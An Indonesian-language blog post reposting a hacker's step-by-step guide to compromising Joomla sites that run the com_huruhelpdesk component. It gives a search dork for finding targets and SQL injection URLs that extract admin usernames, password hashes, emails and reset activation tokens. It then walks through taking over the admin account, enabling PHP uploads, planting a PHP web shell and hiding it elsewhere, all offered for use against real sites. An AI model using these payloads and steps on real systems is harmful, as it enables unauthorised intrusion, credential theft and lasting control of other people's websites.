Share Informasi Teknologi | Tips Trik | Dunia IT | Artikel | Unik | SEO | Berita

Step by step SQL Injection 'Joomla

by poetra , at 16.25 , have 0 komentar
* title : exploit joomla : com_huruhelpdesk + reset password + pasang php shell

* author : ho1onk

* site : http://ho1onk.fairtopic.com

********************************************************************************​******



============= PENGANTAR ============

khusus bagi teman2 yang

ga doyan donlod, jaringan lelet/lola

mungkin ini bisa jadi solusi

====================================



==========

[+] step 1

==========

buka google.. ketik keyword

Code:

“inurl:/index.php?option=com_huruhelpdesk\”

tes satu per satu

coba kita ambil yang ini

[+] step 2
==========

pasang exploit..

Code:

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users–
tu admin nya… :P

nampak..

==========

[+] step 3

==========

coba kita reset password nya

Code:

/index.php?option=com_user&view=reset
hm.. minta email dia.. masukin aj email admin tadi..

enter..

==========

[+] step 4

==========

minta activation pula

hmm.. gimana ne?

tenang.. kita cari dulu activationnya

Code:

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email,0x3a,activation),5,6,7+from+jos_u ​sers–
tu kluar activatifasinya

hehehe

:)

lanjut…

copas aja ke yang tadi.. enter.. :)

==========

[+] step 5

==========

copas aja ke yang tadi.. enter.. :)

:P

==========

[+] step 6

==========

wkwkkw

minta pasword baru tu.. kasih aja..

hehhehe

 ==========
[+] step 7

==========

OK langsung aja masuk ke admin nya..

:)

Code:

http://[site]/[pacth]/administrator
wkekwekwke

==========

[+] step 8

==========

masuk ternyata.. heheh

sabar²..

nah.. di sini ente harus ubah dulu “Global configuration” nya

lalu setelah itu masuk ke “media manager”

==========

[+] step 9

==========

nah.. kita ke gloal configuration terlebih dahulu

ubah media settingnya, tambahin aja php

jangan lupa di save..

:D

==========

[+] step 10

==========

OK

lanjut..

buka media manager..

nah, ini tahap terakhir..

upload lah shell php mu..

kwkekwkekwe :)

seep selesai..

bila tidak ada tulisan berwarna merah berrti berhasil..

shell kita ada di sini

Code:

http://[site]/[pacth]/images/namashell.php
OK sekarang terserah ente.. mau apain tu site..

saran ane.. kalo bisa..

uploada aja lagi shell di directory yang lain..

lalu hapus shell yang di directory images tadi..

sekian aja dulu

selamat mencoba.. :D


Step by step SQL Injection 'Joomla
Step by step SQL Injection 'Joomla - written by poetra , published at 16.25 . And have 0 komentar
No comment Add a comment

Terima kasih telah berkunjung.
Jangan lupa tulis komentarnya ya.

Cancel Reply
GetID

Copyright ©2013 Kucing4rt Blog's
Theme designed by Damzaky - Published by Proyek-Template
Powered by Blogger
--> -->